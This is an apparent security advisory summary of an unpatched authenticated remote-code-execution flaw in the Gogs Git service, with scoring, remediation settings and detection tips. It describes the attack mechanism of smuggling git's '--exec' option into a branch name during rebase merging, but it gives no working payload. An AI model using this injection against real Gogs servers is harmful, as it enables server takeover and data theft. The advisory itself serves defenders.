Full Report
A critical security vulnerability has been disclosed in Gogs, a popular open-source self-hosted Git service, that allows an authenticated user to execute arbitrary code under certain conditions. The security flaw, per Rapid7, is rated 9.4 on the CVSS scoring system. It does not have a CVE identifier. "The vulnerability allows any authenticated user to achieve remote code execution (RCE) on
Analysis Summary
# Vulnerability: Authenticated Remote Code Execution via Argument Injection in Gogs
## CVE Details
- **CVE ID:** No CVE identifier assigned at this time.
- **CVSS Score:** 9.4 (Critical)
- **CWE:** CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
## Affected Systems
- **Products:** Gogs (Open-source self-hosted Git service)
- **Versions:** All versions as of May 28, 2026 (Unpatched).
- **Configurations:**
- Default configurations (where registration and repository creation are open).
- Instances with "Rebase merging" enabled.
- Impact covers all supported platforms: Windows, Linux, and macOS.
## Vulnerability Description
The flaw is an argument injection vulnerability involving the `git rebase` command. Gogs fails to properly sanitize branch names when performing a "Rebase before merging" operation. An attacker can create a malicious branch name containing the `--exec` flag.
When the rebase operation is triggered, Git interprets the `--exec` flag and executes the subsequent shell command attached to it. This allows for arbitrary code execution with the privileges of the user running the Gogs service.
## Exploitation
- **Status:** PoC available (Metasploit module released by Rapid7).
- **Complexity:** Low (Can be automated; requires no admin interaction).
- **Attack Vector:** Network (Authenticated).
## Impact
- **Confidentiality:** High (Access to all repositories, private data, credentials, and cross-tenant data).
- **Integrity:** High (Ability to tamper with hosted source code and server files).
- **Availability:** High (Potential for full system takeover or service disruption).
## Remediation
### Patches
- **None:** As of the report date, the vulnerability remains unpatched by the maintainer.
### Workarounds
Administrators should implement the following hardening measures in the `app.ini` configuration file:
- **Disable Public Registration:** Set `DISABLE_REGISTRATION = true` to prevent unauthorized actors from creating accounts.
- **Restrict Repo Creation:** Set `MAX_CREATION_LIMIT = 0` to prevent existing low-privileged users from creating new repositories to use as exploit vectors.
- **Audit Permissions:** Ensure only trusted users have write/merge access to existing repositories and audit repositories where "rebase merging" is enabled.
## Detection
- **Indicators of Compromise:** Monitor server logs for HTTP 500 errors occurring after repository creation/deletion events.
- **Detection Methods:** Audit the filesystem and project history for unexpected branches containing characters like `--` or shell commands. Monitor for unusual child processes spawned by the Gogs/Git process.
## References
- Rapid7 Technical Analysis: hxxps[://]www[.]rapid7[.]com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/
- Metasploit Module: hxxps[://]github[.]com/rapid7/metasploit-framework/pull/21515
- News Source: hxxps[://]thehackernews[.]com/2026/05/critical-gogs-rce-vulnerability-lets.html